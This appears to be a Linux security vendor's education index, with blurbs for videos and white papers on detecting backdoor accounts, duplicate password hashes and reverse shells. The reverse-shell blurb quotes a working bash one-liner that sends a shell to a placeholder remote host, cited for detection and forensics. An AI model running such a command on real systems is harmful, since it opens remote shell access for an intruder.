Education
Linux Default User Password Attack Detection and Forensics
Linux ships with default users disabled. But, attackers can activate these accounts to allow backdoor access that can hide for a long time. In this video we discuss this threat, how to find it with…
Linux Duplicate User Password Hash Attack
Duplicate password hashes on Linux are a tactic for attackers to drop backdoor accounts in an automated way. In this video we explain what a duplicate password hash attack is, and how you can find it…
Linux Reverse Shell Detection and Forensics
In this video, we cover how to investigate one of our favorite reverse shells on Linux: bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1 This simple command will launch a shell from the victim system to…
Rob Joyce Interview - Linux Critical Infrastructure Threats
Watch as Rob Joyce, former head of the NSA Cybersecurity Directorate, discusses threats against Linux critical infrastructure with Sandfly founder Craig Rowland. This video will help security teams…
Agentless Password Auditing for Linux White Paper
We have released a white paper on our powerful agentless password auditor for Linux. We discuss the problem of password brute force attacks, and how Sandfly can quickly and safely audit for weak…
Sandfly Performance White Paper
Sandfly is known for our wide compatibility and high performance when protecting Linux. Customers often ask us what we do to make sure their critical systems are not impacted with our agentless…